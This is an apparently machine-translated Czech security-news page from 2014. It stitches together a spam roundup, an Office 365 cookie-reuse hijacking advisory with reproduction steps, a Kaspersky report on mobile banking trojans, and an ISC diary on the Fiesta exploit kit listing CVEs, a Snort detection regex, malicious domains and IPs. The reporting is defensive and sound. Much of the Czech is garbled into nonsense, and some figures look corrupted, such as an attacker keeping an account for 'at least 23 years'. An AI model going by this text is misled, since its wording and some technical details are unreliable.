Jak se dalo očekávat, spammeři i nadále posílat "nigerijské" dopisy využívající téma Nelsona Mandely smrti. Tentokrát podvodníci prošel sebe pryč jako manželky nebo asistentů bývalého prezidenta. Ledna také viděl Ariela Šarona smrti použity k oklamat uživatele.

Dalším významnou událostí zneužít podvodníci se olympijské hry v Soči. Hromadné e-maily byly detekovány v lednu reklamách na falešné značkové zboží a doplňky s logem her.

Hodnocení leden organizací zaměřeny nejčastěji phishery viděl malou změnu oproti předchozímu měsíci. Sociálních sítí zůstal na prvním místě s nárůstem o 0,9 procentního bodu. Jsou následuje e-mail a instant messenger, a kategorie vyhledávače, jejichž akcie také mírně vzrostl.

Populární sociálních sítí a instant messenger služby zachovány zůstaly cíle volbou pro falešné oznámení, které obsahují škodlivé programy. V lednu byla škodlivé oznámení provedené vypadají, jako by byly odeslány z WhatsApp cross-platformní messenger pro chytré telefony.


Office 365 - Účet únos Cookie Re-Use Chyba, prodlužuje

1.3.2014 Zranitelnosti

Název:
Office 365 - Účet únos Cookie Re-Use Chyba, rozšířené Prodávající: - Microsoft produkty postižené: - Office 365 E3 balení (verze od 22 února 2014) - SharePoint Online Services Abstrakt: Známý účet únos přes cookie re použití vada byla původně hlášena v červenci 2013 prof Sam Bowne a projednán v několika ? stejně jako původní zranitelnost hasn t Beed uzavřeny této zprávy, je tu další vážný dopad na poražení tuto chybu: - Změna hesla uživatele neruší ukradené cookie - Blokování účtu (uživatel uzamčení) nebude fungovat jako dobře . To umožňuje útočníkovi zneužít uživatelský účet po dobu nejméně 23 let, než byl účet zcela vymazán Kroky pro reprodukci: * Předpoklady: - Office 365 účtu (E3 balíček s Sharepoint Services) - Jak škodlivého systém: Windows O / S Client a Interner Explorer 9 až 11 nebo Firefox 25 + (Jiné operační systémy a prohlížeče dosud nebyly testovány), cookies, nesmí být odstraněny při zavření prohlížeče. - pouze ověřování hesla použít (výchozí) * Příprava kroky: 1) Přihlášení uživatele o použití nedůvěryhodné zařízení (např. internetová kavárna) se office365 přes oficiální Microsoft Online portál login.onmicrosoft.com s nastavením?, aby mi byly podepsány dne? 2) uživatel se dostane k jeho povolených webových stránek týmu na SharePoint Services, např.. replacethiswithyourtestsite.onmicrosoft.com 3) uživatel nyní opustí nedůvěryhodný zařízení buď vypnutím počítače, zavřete prohlížeč nebo jen odhlásili pouze z os, s ), není odhlášení z aplikace Microsoft portálu správně b) a není čistil Cookies * Známá První část - Cookie opětovné použití vada: 4) Uživatel se zlými úmysly (předvečer) lze použít (důvěrné) SharePoint url jednoduše znovu pomocí cookie. 5) Z platného Sharepoint Online Services přístup všechny ostatní služby lze být přístupné (OWA, SkyDrive a tak dále), zatímco osvěžující své pověření cookies, * rozšíření chyba - může t blokování útočník:? 6) Je-li uživatel by mohl být vědomi své poruchy, nebo je detekován zneužití, uživatel se může pokusit změnit své heslo nebo nechat správce resetovat heslo uživatele nebo . 7) Správce může rozhodnout o zablokování účtu od připojení pomocí oac 8) V obou směrech, ukradený cookie bude stále možné přijímat (viz kroky 4 a 5.) Prodávající odezvy: - problém byl ohlášen společnosti Microsoft v několika způsoby: - Ticket 1235308167 (podpora Microsoft USA) - Ticket 201402160322129434 (Microsoft Partner Support Německo) - Ticket 114021011169872 (Microsoft Office Online Uživatelská podpora Německo) - Žádné řešení nabídl tak daleko, ale problém byl uznán by Microsoft Partner německou podporu řešení: -. Z forenzních důvodů by mohlo být to nedoporučuje, ale v té době jsem don t vidět nějaké jiné řešení, jediný způsob, jak je úplně odstranit napadl účtu - Tento způsob je shodný s řešení společnosti Microsoft nabízí jako řešení ve svém internetovém fóru.


Mobilní malware Evolution: 2013
1.3.2014 Analýza | Mobil

Mobilní malware sektor je rychle rostoucí a to jak technologicky a konstrukčně. Je to bezpečné říci, že dnešní cybercriminal již není osamělý hacker, ale součástí vážné hospodářské činnosti.

Existují různé typy subjektů zapojených do mobilního malwaru průmyslu: autoři virů, testery, návrháři rozhraní obou škodlivých aplikací a webových stránek, které jsou distribuovány z, majitelé partnerských programů, které se šíří malware, a majitelé mobilní botnet.

Tato dělba práce mezi zločinci mohou také být viděn v chování jejich trojské koně. V roce 2013, existují důkazy o spolupráci (s největší pravděpodobností na komerční bázi) mezi různými skupinami autory virů. Například, botnet Trojan-SMS.AndroidOS.Opfake.a, kromě své vlastní činnosti, také šířit Backdoor.AndroidOS.Obad.a zasláním spamu obsahující odkaz na malware do seznamu oběti kontaktů.

Nyní je jasné, že zřetelné průmysl vyvinul a je stále více zaměřena na těžebním zisků, což je zřejmé z funkčnosti malware.

2013 v číslech
Bylo zjištěno celkem 143.211 nových úprav škodlivých programů zaměřených na mobilní zařízení ve všech od roku 2013 (od 1.1.2014).
V roce 2013, 3.905.502 instalační balíčky byly využívány zločinci k distribuci mobilního malwaru. Celkově v letech 2012-2013 jsme zjištěna přibližně deset milionů unikátních škodlivých instalačních balíčků:

Počet instalačních balíčků zjištěných v letech 2012-2013

Různé instalační balíčky lze instalovat programy se stejnou funkčností, které se liší pouze z hlediska škodlivého app rozhraní a, například, obsah textových zpráv, které se šíří.
Android je stále terčem zákeřných útoků. 98,05% všech malware detekovaného v roce 2013 zaměřena tuto platformu, což potvrzuje i popularitu tohoto mobilního operačního systému a zranitelnost jeho architektuře.

Distribuce mobilního malware zjištěn v roce 2013 podle platformy

Většina mobilní malware je navržen tak, aby ukrást peníze uživatelů, včetně SMS trojské koně, a spoustou zadních vrátek a trojských koní.

Distribuce mobilního malwaru podle kategorie

V průběhu roku se počet mobilních malware úprav určených pro phishing, krádež informací o kreditních kartách a peníze se zvýšila o faktor 19,7. V roce 2013, mobilní produkty společnosti Kaspersky Lab zabráněno 2500 napadením bankovních trojských koní.
Metody a postupy
2013 došlo nejen radikální nárůst výkonu z mobilního autoři virů, ale také viděl, je aktivně uplatňovat metody a technologie, které dovolily zločinci efektivněji využívat jejich malware. Tam bylo několik různých oblastí, kde mobilní malware podstoupili zálohy.

Distribuce

Počítačoví zločinci využili některých mimořádně sofistikovaných metod infikovat mobilní zařízení.

Infikovat právní webové zdroje napomáhá šíření mobilního malwaru prostřednictvím populárních webových stránkách. Stále více a více chytrých telefonů a tabletů majitelé využívat své zařízení k přístupu na internetové stránky, si neuvědomuje, že i většina renomovaných zdrojů může být počítačový pirát. Podle našich údajů, 0,4% z navštívených webových stránek uživateli našich výrobků byly ohroženy stránky.

Distribuce prostřednictvím alternativních app obchodech . V Asii existuje řada společností, které vyrábějí Android-založené zařízení a Android aplikací, a mnoho z nich nabízí uživatelům vlastní app obchody, které obsahují programy, které nelze nalézt v Google Play. Čistě nominální kontrolu nad aplikací nahraných na těchto prodejnách znamená, že útočníci mohou skrývat trojské koně v aplikacích vypadat jako nevinné hry nebo utility.

Distribuce prostřednictvím botnetů. Zpravidla bots self-množit zasláním textové zprávy s nebezpečným odkazem na adresy v adresáři oběti. Jsme také registrována jednu epizodu mobilní malware šíří prostřednictvím třetí strany botnet.

Odolnost na ochranu proti malware

Schopnost škodlivého softwaru neustále pracovat na mobilním zařízení oběti je důležitým aspektem jejího vývoje. Čím déle Trojan "žije" na telefonu, tím více peněz to bude pro majitele. To je oblast, kde autoři virů se aktivně pracuje, což má za následek velké množství technologických inovací.

Zločinci jsou stále více využívají mlžení , záměrné jednání o vytvoření komplexní kód, aby je obtížné je analyzovat. Čím složitější je zmatek, tím déle bude trvat antivirové řešení pro neutralizaci škodlivého kódu. Výmluvné je, aktuální spisovatelé virů zvládli komerční obfuskátory. To znamená, že vynaložily značné investice. Například, jeden komerční obfuscator, která stála 350 €, byl použit pro trojské koně a Opfak.bo Obad.a

Android zranitelnosti jsou využívány zločinci ze tří hlavních důvodů: aby se vyhnula kód kontrolu integrity při instalaci aplikace (zranitelnost Master Key), s cílem posílit práva škodlivých aplikací, značně rozšiřují své schopnosti, a aby to více obtížný pro odstranění škodlivého softwaru. Například, Svpeng využívá dosud neznámou zranitelnost se chránit před ručně odstranit nebo antivirového programu.

Počítačoví zločinci také zneužít tuto chybu zabezpečení hlavního klíče a naučili vložit nepodepsané spustitelné soubory v Android instalačních balíčků. Digitální ověření podpisu lze obejít tím, že soubor škodlivý přesně stejný název jako legitimní soubor a umístit jej na stejné úrovni v archivu. Systém ověřuje podpis oprávněného souboru při instalaci souboru škodlivého.

Bohužel, je specifickým rysem Android zabezpečení, které znamená, že je možné pouze se jich zbavit tím, že obdrží aktualizace od výrobce zařízení. Nicméně, mnoho uživatelů se v žádném spěchu aktualizovat operační systémy svých výrobků. Pokud smartphone nebo tablet byla vydána před více než rokem, je to pravděpodobně již není podporován výrobcem a záplatování zranitelností již není k dispozici. V tomto případě, pouze pomoc přichází z antivirové řešení, například Kaspersky Internet Security pro Android.

Vkládání škodlivého kódu do legitimních programů pomáhá zakrýt infekce z oběti. Samozřejmě, že to neznamená, že digitální podpis vývojáře softwaru mohou být použity. Nicméně, vzhledem k neexistenci certifikačních středisek, které ověřují digitální podpisy programy Android, nic nebrání tomu, zločince od přidání vlastního podpisu. Jako výsledek, kopie Angry Birds instalovaných z neoficiálních app store nebo stažených z fóra může snadno obsahovat škodlivý funkčnost.

Možnosti a funkce

V roce 2013, jsme zjistili několik technologických inovací vyvinula a zločinci používají v jejich škodlivého softwaru. Níže jsou uvedeny popisy některých z nejzajímavějších.

Řízení malware z jednoho centra poskytuje maximální flexibilitu. Botnet může výrazně více peněz, než autonomních trojské koně. To přijde jako žádné překvapení, pak, že mnoho SMS-Trojské koně patří funkčnost bot. Podle našich odhadů asi 60% z mobilního malwaru jsou prvky obou velkých a malých mobilních robotických sítí.

Pomocí Google Cloud Zprávy majitelé botnet může pracovat bez serveru C & C, čímž se eliminuje hrozba botnet je detekován a blokován donucovacími orgány. Google Cloud Messaging je navržen tak, aby odeslat krátkou zprávu (do 4 KB) do mobilních zařízení prostřednictvím služby Google. Developer prostě musí zaregistrovat a získat jedinečné ID pro jeho aplikace. Příkazy přijaté přes GCM nelze okamžitě zablokován na infikované zařízení.

Zjistili jsme několik škodlivých programů pomocí GCM pro velení a řízení - rozšířené Trojan-SMS.AndroidOS.FakeInst.a, Trojan-SMS.AndroidOS.Agent.ao, a Trojan-SMS.AndroidOS.OpFake.a mezi ostatními. Google je aktivně bojovat proti tomuto užívání služby, rychle reagovat na zprávy z antivirových společností a blokování identifikátory zločinci.

Útoky na systému Windows XP umožňují mobilní malware infikovat počítač po připojení smartphonu nebo tabletu. Na začátku roku 2013 jsme zjištěny dva stejné aplikace na Google Play, které byly údajně určeny pro čištění operačního systému zařízení se systémem Android od zbytečných procesů. Ve skutečnosti, že aplikace jsou navrženy tak, aby stažení souboru autorun.inf, ikonu souboru a soubor Win32 Trojan, který mobilní škodlivý program vyhledá v kořenovém adresáři SD karty. Na připojení smartphonu v režimu USB disku emulace k počítači se systémem Windows XP, systém automaticky spustí Trojan (pokud AutoPlay na externí médium není zakázán) a je nakažený. Trojan umožňuje zločinci na dálku ovládat počítač oběti a je schopen nahrávat zvuk z mikrofonu. Chtěli bychom zdůraznit, že tento způsob útoku funguje pouze na Windows XP a Android verze před 2.2.

Nejvyspělejší mobilní škodlivé programy jsou dnes trojské koně zaměřené na bankovní účty uživatelů - nejatraktivnější zdroj trestních výdělku.

Trend z roku: mobilní bankovnictví trojské koně
2013 byl poznamenán rychlým nárůstem počtu Android bankovních trojských koní. Cyber ​​průmysl mobilního malwaru je stále více zaměřena na zefektivnění zisku, tj. mobilní phishing, krádež informací o kreditních kartách, převody peněz z bankovních karet do mobilních telefonů a od telefonů na e-peněženek zločinců. Počítačoví zločinci se stali posedlí touto metodou nelegálních příjmů: na začátku roku jsme věděli, že pouze 67 bankovních trojských koní, ale do konce roku to již bylo 1321 unikátních vzorků. Mobilních produktů společnosti Kaspersky Lab zabránit 2.500 infekcí bankovní trojské koně.


Počet mobilních bankovních trojských koní v naší sbírce

Mobilní bankovnictví trojské koně může běžet spolu s Win-32 trojské koně, aby se vyhnula dvoufaktorovou autentizaci - MTAN odcizení (krádež ověřování bankovní kódy, které banky posílají své zákazníky SMS zpráv). Nicméně, v roce 2013, autonomní mobilní bankovnictví trojské koně dále rozvíjet. V současné době jsou tyto trojské koně útoku omezeného počtu klientů bank, ale očekává se, že zločinci budou vymýšlet nové techniky, které jim umožní rozšířit počet a geografii potenciálních obětí.


Infekce způsobené mobilních bankovních programů

Dnes, většina bankovních trojských útoků vliv na uživatele v Rusku a Společenství nezávislých států. Nicméně, tato situace nebude trvat dlouho: vzhledem zájem počítačovými zloději "v uživatelských účtech, činnost mobilních bankovních trojských koní se očekává, že růst v jiných zemích v roce 2014.

Jak bylo uvedeno výše, bankovní trojské koně jsou snad nejsložitější ze všech mobilních hrozeb, a Svpeng je jedním z nejvýraznějších příkladů.

Svpeng

V polovině července jsme zjistili Trojan-SMS.AndroidOS.Svpeng.a, který na rozdíl od svých protějšků SMS trojské koně, je zaměřen na krádeže peněz z bankovního účtu oběti, spíše než z jeho mobilního telefonu. To nemůže jednat samostatně a pracuje přísně v souladu s příkazy obdržel od serveru C & C. Tento škodlivý program se šíří přes SMS spamu a od napadených legitimních stránek, které přesměrovávají mobilním uživatelům se zlými úmysly zdroj. Tam je uživatel vyzván ke stažení a instalaci Trojan napodobujícím aktualizaci Adobe Flash Player.

Svpeng je schopen dělat spoustu věcí.

Shromažďuje informace o telefonu (IMEI, země, poskytovatele služeb, jazyk operačního systému) a odešle ji do počítače prostřednictvím požadavku HTTP POST. To se zdá být nutné určit počet bank, oběť může používat. Svpeng je pouze v současné době útočí na klienty ruských bank. Typicky, nicméně, zločinci první test-run technologii na ruském sektoru na internetu a pak se vrátit na to globálně, útočí na uživatele v jiných zemích.

To krade SMS zpráv a informace o hlasových hovorů. Pomáhá útočník zjistit, které banky vlastníkem smartphone volání - Trojan obdrží seznam telefonních čísel bankovních z jeho C & C serveru.

To krade peníze z bankovního účtu oběti. V Rusku, některé velké banky nabízejí svým klientům speciální službu, která jim umožňuje převést peníze ze svého bankovního karty na jejich mobilní telefonní účet. Zákazníci mají poslat nastavenou textovou zprávu ze svého telefonu na určitý počet bank. Svpeng odešle příslušné zprávy SMS služeb obou bank. Svpeng dělá to pro kontrolu, zda jsou karty z těchto bank jsou připojeny k počtu infikovaných telefonu a zjistit zůstatek na účtu. Je-li telefon připojen k bankovní kartě, příkazy jsou odesílány ze serveru C & C s pokyny k převodu peněz z účtu uživatele na jeho / její mobilní účtu. Mezi zločinci pak odeslat peníze na digitální peněženky nebo na číslo prémie a peníze ji dovnitř

To krade přihlašovací jména a hesla do on-line bankovní účty nahrazením okno zobrazené bankovní aplikace. V současné době, to se týká pouze ruské banky, ale technologie za Svpeng může být snadno použit pro cílové jiných bankovních aplikací.

To krade údaje o bankovním karty (číslo, datum platnosti, CVC2/CVV2) napodobuje proces registraci bankovní kartu s Google Play. Pokud uživatel zahájila Play trhu, Trojan zachycuje události a zobrazí se okno v horní části okna Google Play, vyzve uživatele k zadání jeho / její platební kartě ve falešné okně. Údaje uvedené uživatelem je zaslána zločinci.

Je vymáhá peníze od uživatelů tím, že hrozí zablokovat smartphone: zobrazí zprávu požadující $ 500 odblokovat. Ve skutečnosti, Trojan neblokuje nic a telefon může být použit bez jakýchkoliv problémů.

To h Ides stopy své činnosti zakrývat odchozí a příchozí textové zprávy a blokování hovorů a zpráv z čísla, které patří do banky. Trojan dostane seznam bankovních telefonních čísel z jeho C & C serveru.

Je p rotects se od vypuštění vyžádáním práva správce zařízení během instalace. Jako výsledek, Trojan tlačítko smazat v seznamu aplikací se stane neaktivní, což může způsobit problémy pro nezkušené uživatele. Je nemožné, aby ho zbavit těchto práv bez použití speciálních nástrojů (jako je Kaspersky Internet Security pro Android). Chcete-li chránit sebe před přemístěním, Svpeng využívá dosud neznámou zranitelnost v Android. To používá stejný trik, aby se zabránilo smartphone od vracené do továrního nastavení.

Trojan je distribuován v Rusku a zemích SNS. Ale, jak jsme již zmínili, že zločinci mohli snadno obrátit svou pozornost k uživatelům v jiných zemích.

Perkele a Wroba

Zahraniční uživatelé také byli na přijímacím konci roku více škodlivých inovací zaměřených na bankovní účty.

Perkele Android Trojan nejen útoky ruských uživatelů, ale také klientům z několika evropských bank. Je zajímavé především proto, že funguje ve spojení s různými bankovními Win32 trojské koně. Jeho hlavním úkolem je, aby se vyhnula dvoufaktorovou autentizaci klienta v on-line bankovního systému.

Vzhledem ke specifické povaze své činnosti, Perkele je distribuován v poněkud neobvyklým způsobem. Když uživatel zadá bankovní internetové stránce na počítač napaden bankovní malware (Zeus, Citadela), žádost o počtu smartphone a typ operačního systému, je vstříknut do kódu přihlašovací stránku. Tato data jsou okamžitě zaslán zločinci a počítač zobrazí QR kód s odkazem na údajné certifikátu on-line bankovního systému. Po naskenování QR kód a instalaci komponenty stáhnout z odkazu, uživatel infikuje svůj smartphone s Trojan program, který se může pochlubit funkcí, které je velký zájem útočníků.

Perkele zachycuje mTANs (potvrzení kódy bankovních operací) zaslané bankou prostřednictvím textové zprávy. Pomocí přihlašovací jméno a heslo, ukradené z prohlížeče, Windows Trojan spustí falešnou transakci, zatímco Perkele zachytí (prostřednictvím serveru C & C) MTAN poslal bankou pro uživatele. Peníze pak zmizí z účtu oběti a inkasoval bez vědomí majitele.

Korejský malware Wroba, kromě tradičních vektoru infekce přes soubor-sdílení služeb, se šíří přes alternativní app obchodech. Jakmile se infikuje zařízení, Wroba se chová velmi agresivně. Hledá pro mobilní bankovní aplikace, odstraní je a obrázky padělané verze. Z vnější strany, které jsou k nerozeznání od legitimních aplikací. Nicméně, oni mají žádné bankovní funkce, a jen krást jména a hesla zadaných uživatelem.

TOP 10 mobilní hrozby zjištěné v roce 2013
Jméno * % Ze všech útoků
1 DangerousObject.Multi.Generic 40.42%
2 Trojan-SMS.AndroidOS.OpFake.bo 21.77%
3 AdWare.AndroidOS.Ganlet.a 12.40%
4 Trojan-SMS.AndroidOS.FakeInst.a 10.37%
5 RiskTool.AndroidOS.SMSreg.cw 8.80%
6 Trojan-SMS.AndroidOS.Agent.u 8,03%
7 Trojan-SMS.AndroidOS.OpFake.a 5,49%
8 Trojan.AndroidOS.Plangton.a 5,37%
9 Trojan.AndroidOS.MTK.a 4,25%
10 AdWare.AndroidOS.Hamob.a 3,39%
1.. DangerousObject.Multi.Generic. Tento rozsudek znamená, že jsme si vědomi škodlivého charakteru dané aplikace, ale pro toho či onoho důvodu nejsou poskytovány našim uživatelům s podpisy detekovat. V takových případech, detekce je k dispozici prostřednictvím cloudových technologií realizovaných společností v Security Network Kaspersky, které umožňují naše výrobky minimalizovat čas potřebný k reakci na nové a neznámé hrozby.

2. Trojan-SMS.AndroidOS.OpFake.bo. To je jeden z nejvíce sofistikovaných SMS trojské koně. Jeho charakteristické znaky jsou dobře navržené rozhraní a chamtivost jeho vývojářů. Po spuštění se krade peníze z majitele mobilního zařízení - od $ 9 k celé částky na účet uživatele. Je zde také riziko, telefonní číslo uživatele je zdiskreditovaný, protože Trojan může sbírat čísla ze seznamu kontaktů a SMS do všech těchto čísel. V malware se zaměřuje především rusko-reproduktory a uživatelů v zemích SNS.

3. AdWare.AndroidOS.Ganlet.a. reklamní modul, který má funkce potřebné pro instalaci dalších aplikací.

4. Trojan-SMS.AndroidOS.FakeInst.a. Tento malware se vyvíjel v průběhu posledních dvou let od jednoduchého SMS Trojan do plně funkčního robota řízeného prostřednictvím různých kanálů (včetně Google Cloud Messaging). Trojan může ukrást peníze z účtu uživatele a odesílat zprávy na čísla v seznamu kontaktů oběti.

5. RiskTool.AndroidOS.SMSreg.cw. Tento platební modul je rozšířený v Číně. To je zahrnuta v různých hrách jako modul pro vytváření on-line nákupy prostřednictvím SMS v rámci aplikace. Odstraňuje textové zprávy s potvrzením od zúčtovacího systému bez vědomí uživatele. Oběti nemám ponětí, peníze byly ukradeny ze svého mobilního telefonu, dokud se zkontrolovat stav.

6.. Trojan-SMS.AndroidOS.Agent.u. Jednalo se o první Trojan používat zranitelnost v OS Android pro získání ZAŘÍZENÍ oprávnění správce, čímž její odstranění velmi obtížný úkol. Kromě toho, že je schopen odmítnout příchozí hovory a volat na jeho vlastní. Možné poškození: odesílání více SMS zpráv s náklady v celkové výši 9 nebo více.

7. Trojan.AndroidOS.Plangton.a. Tento reklamní modul odešle osobní údaje uživatele (bez jejich vědomí) k reklamním serveru, aby to vypadalo jako cílené reklamní kampaně. Výsledná škoda zahrnuje číslo mobilního telefonu uživatele, účtu Google a některé další data jsou diskreditaci. Tento Trojan také libovolně mění domovskou stránku prohlížeče a dodává reklamní záložky.

8. . Trojan-SMS.AndroidOS.OpFake.a Tento multifunkční bot pomáhá distribuovat sofistikované Android malware Backdoor.AndroidOS.Obad.a. složen z těchto dvou je extrémně nebezpečný, protože jeho:

Široká škála možností: krádež identity, posílání textových zpráv na jakékoli číslo. Instalace aplikace, jako by to mohlo vést ke všem peněz, ukradené z mobilního účtu. To může také vyústit v dotčeném telefonní číslo je zdiskreditované po kontaktní čísla ukradené z účtu se používají k posílání textových zpráv. Seznam kontaktů bude také odeslat na server zločince.
extrémně komplexní sebeobranné mechanismy a protiopatření, které brání odstranění. Vzhledem k využití na Android zranitelnosti, to Trojan nelze odstranit bez speciálního programu, jako je KIS pro Android.
Je třeba poznamenat, že Trojan-SMS.AndroidOS.OpFake.a je rozložena na větší geografickou oblast než ostatní Top 10 vůdců. Často se zaregistrovat pokusy infikovat zařízení, a to nejen v zemích SNS, ale také v Evropě.

9. Trojan.AndroidOS.MTK.a. Jedná se o sofistikovaný Trojan program s širokou funkčnost a sofistikovaných metod šifrování přenosu. Jeho hlavním úkolem je spustit nebezpečné aplikace, které byly staženy do infikovaného zařízení.

10. AdWare.AndroidOS.Hamob.a je reklamní aplikace napodobovat legitimní programy (pomocí názvu a ikony, např. WinRAR), zatímco jeho jedinou funkcí je zobrazení reklamy.

Top 10 zahrnuje čtyři SMS trojské koně, i když některé z nich mají kontrolní mechanismy, které přeměňují infikované zařízení do roboty.

Geografie hrozeb

Země, kde se uživatelé setkávají největší riziko mobilního malware
(procento všech napadených unikátních uživatelů)

Top 10 zemí podle počtu napadených unikátních uživatelů:

Země % Ze všech napadených unikátních uživatelů
1 Rusko 40.34%
2 Indie 7,90%
3 Vietnam 3,96%
4 Ukrajina 3,84%
5 Spojené království 3,42%
6 Německo 3,20%
7 Kazachstán 2,88%
8 Spojené státy americké 2.13%
9 Malajsie 2.12%
10 Írán 2,01%
Mobilní hrozby mají vlastnosti specifické pro tento region - útočníci používají různé kategorie mobilního malwaru v závislosti na regionu nebo zemi. Níže je uvedeno několik příkladů distribuci mobilního malwaru podle země.

Rusko
V Rusku, mobilní počítačová kriminalita je zvláště převládající - 40,3% ze všech uživatelů zaútočili na celém světě v roce 2013 se nachází v této zemi.

Top 5 rodin z mobilního malware distribuovaných v Rusku

Rodina % Ze všech napadených unikátních uživatelů
Trojan-SMS.AndroidOS.OpFake 40.19%
Trojan-SMS.AndroidOS.FakeInst 28.57%
Trojan-SMS.AndroidOS.Agent 27.11%
DangerousObject.Multi.Generic 25.30%
Trojan-SMS.AndroidOS.Stealer 15.98%

V roce 2013 Rusko opět vedl v počtu infekcí SMS Trojan a v současné době žádné známky toho, že se situace zlepší. Jak již bylo uvedeno výše, většina mobilních bankovních trojských koní zaměřit ruské uživatele.

Rusko a země SNS často slouží jako zkušební terén pro nové technologie: když zdokonalil své technologie v ruské jazykové oblasti internetu, se zločinci pak obrátit svou pozornost k uživatelům v jiných zemích.

Německo
Německo je jednou ze zemí západní Evropy, kde SMS trojské koně jsou velmi aktivní. V roce 2013 byla Evropa jasně cíl pro ruské autory virů, protože jejich zpeněžení podvody zahrnující textové zprávy odesílané na prémiová čísla funguje dobře v tomto regionu. V Německu jsme zaznamenali neustálé pokusy o SMS Trojan infekce, zejména Agent malware rodiny.

Mobilní bankovní trojské koně jsou také aktivně používá v této zemi: Německo zaujímá první místo mezi západoevropských zemí podle počtu unikátních uživatelů napadených (6. místo ve světovém hodnocení).

Top 5 rodin z mobilního malwaru distribuován v Německu

Rodina % Ze všech napadených unikátních uživatelů
RiskTool.AndroidOS.SMSreg 25.88%
DangerousObject.Multi.Generic 20.83%
Trojan-SMS.AndroidOS.Agent 9,25%
Trojan.AndroidOS.MTK 8,58%
AdWare.AndroidOS.Ganlet 5,92%
USA
Situace v USA je jiný. Nejsou žádné zpeněžení podvody týkající textových zpráv, což znamená, že není jasné dominance mobilních SMS trojské koně. Vůdci jsou roboty sběr dat o infikovaných smartphony.

Top 5 rodin z mobilního malware distribuovaných v USA

Rodina % Ze všech napadených unikátních uživatelů
DangerousObject.Multi.Generic 19.75%
RiskTool.AndroidOS.SMSreg 19.24%
Monitor.AndroidOS.Walien 11.24%
Backdoor.AndroidOS.GinMaster 8,05%
AdWare.AndroidOS.Ganlet 7,29%
Čína
V Číně existuje mnoho reklamních modulů integrovaných do čistých a dokonce i škodlivé aplikace. Funkce reklamních modulů jsou různorodé, dokonce jít tak daleko, jak stahování škodlivého softwaru telefonu oběti. SMS trojské koně a zadní vrátka jsou také velmi populární v Číně.

Top 5 rodin z mobilního malware distribuovaných v Číně

Rodina % Ze všech napadených unikátních uživatelů
RiskTool.AndroidOS.SMSreg 46.43%
AdWare.AndroidOS.Dowgin 19.18%
DangerousObject.Multi.Generic 13.89%
Trojan-SMS.AndroidOS.Agent 10.55%
Trojan.AndroidOS.MTK 10.13%
Závěr
Škodlivý software, který útočí na uživatele mobilních bankovních účtů se stále vyvíjí a počet programů, rychle roste. Je zřejmé, že tento trend bude pokračovat, s více mobilních bankovních trojských koní a nových technologií, aby se zabránilo detekci a odstranění.

Ze všech mobilních vzorků malwaru zjištěných v roce 2013, boty byly nejpočetnější kategorií. Útočníci jsou jasně vidět výhody mobilních robotických sítí, pokud jde o vytváření zisku. Nové mechanismy pro řízení mobilních botnetů se mohou objevit v blízké budoucnosti.

V roce 2014 očekáváme zranitelnosti ve všech typech aktivně využívaných dát malware root přístup k zařízení, takže odstranění ještě obtížnější.

2013 viděl poprvé zaregistrován malware útok na počítače spouští z mobilního zařízení. Počasí jsme budoucích Wi-Fi útoky z mobilních zařízení na sousedních stanic a širší infrastruktuře.

SMS trojské koně jsou pravděpodobně zůstanou mezi mobilními malware vůdců a dokonce dobýt nové území.


Fiesta
1.3.2014 Bezpečnost

Ne, my jsme vypukla na pivo nebo se rozhodli začít o víkendu brzy. Tento deník ISC není načase strany, ale spíše o "Fiesta Exploit Kit". Jsme v poslední době svědky uptick jejího použití na nedůvěryhodné weby.

Fiesta byl asi v té či oné podobě od roku 2012, kdy se oddělil soupravy "NeoSploit", a pravidelně se dovybavit novými využije zůstat efektivní. V první fázi je obvykle jen přesměrování, na skutečné využití místa, odkud se dostane silně zakódovaný / popletl soubor JavaScript stáhli. Tento soubor JavaScript kontroluje lokálně nainstalovaného softwaru, a pak se spustí nebo stáhne odpovídající exploit (s).

V současné době nejrozšířenější verze Fiesta Zdá se, že používat stejné pěti hrdinských činech / zranitelná, protože o listopadu loňského roku:

CVE-2010-0188 Adobe Reader TIFF zranitelnost. Kontroly kód pro Adobe Reader verze> = 800 <821 a> = 900 <931, a to pouze vyvolává pokud je nainstalován odpovídající (starověký) Adobe verze.
CVE-2013-0074 Microsoft Silverlight (MS13-022, březen 2013),. Kontroly kód pro Silverlight verze> = 4050401 a <5120125, a spouští případně využít. Silverlight 5.1.201.25.0 je verze poté, co byla použita oprava MS13-022
CVE-2013-2465 Oracle Java. Samozřejmě - tam musel být Java sploit v mixu. Kontroly kód pro Java> 630 <722
CVE-2013-0634 Adobe Flash Player. Kontroly kódu pro Flash Player> = 110000 <= 115502.
CVE-2013-2551 Microsoft Internet Explorer (MS13-037, květen 2013),. Kód v tomto případě jen kontroluje pro IE verze 6 do 10, a pokud je nalezen, pokusí zneužít.
Systém se přiměřeně aktuální patche by měly mít čeho bát od shora. Skutečnost, že Fiesta nebyl široce re-obrobený na novější využije naznačuje, že i když výše sada zranitelnosti stále síťoviny padouchy spoustu nově využívaných roboty.

Stávající podpisy Snort EmergingThreat pro Fiesta dělají rozumnou práci na špinění útok. Pokud jde o standardní Snort (VRT) ruleset, pravidlo SID 29443 vypadá dobře teď funguje, byla přidána v lednu, aby odpovídal na formátu URL:? "/ ^ \ / [A-z0-9] + \ / \ [ 0-9a-f] {60,66} [\ x3b \ X2C \ d] * $ / U "používá, a je stále spouštění často na aktuální Fiesta vlny.

Jedna Další charakteristikou současné Fiesta je také jeho těžké použití dynamického DNS. Viděno v tomto týdnu doposud byli *. no-ip.info, *. no-ip.org, *. myvnc.com, *. no-ip.biz, *. myftp.com, *. hopto.org a *. serveblog.net . Jedná se o poskytovatele DynDNS, tak samozřejmě ne všechny stránky hostované tam jsou škodlivé. Ale Fiesta dělá rozsáhlé užití těchto služeb se rychle zamíchat své využívají doručení hostitele. Názvy hostitele použité jsou náhodné znaky sekvence 10 nebo 6 znaků, aktuální například " ofuuttfmhz.hopto.org ". Odpovídající stránky jsou často aktivní méně než hodinu před názvem DNS používané v sploits změn znovu.

Co se zdá být poměrně statické, jsou IP adresy - 209.239.113.39 a 64.202.116.124 oba byly použity v posledních dvou týdnech a druhý hoster se zdá být obzvláště "populární", protože sousední adresy (64.202.116.122, 64,202 .116.125) byly v použití Fiesta na konci ledna. Také docela běžné, jsou vstupní stránky hostované na *. in.ua (Ukrajina) domény, jako ujimmy.in.ua, aloduq.in.ua , atd. Tyto oblasti by měly být dostatečně časté v (západních) protokoly webového serveru proxy, aby se jim lépe na místě.

Máte-li jakékoli další aktuální Fiesta Intel (nezahrnující Cerveza :), dejte nám vědět přes kontaktní stránku nebo komentářů pod!


Qualys CEO dodat keynote na konferenci RSA 2014
28.2.2014 Bezpečnost
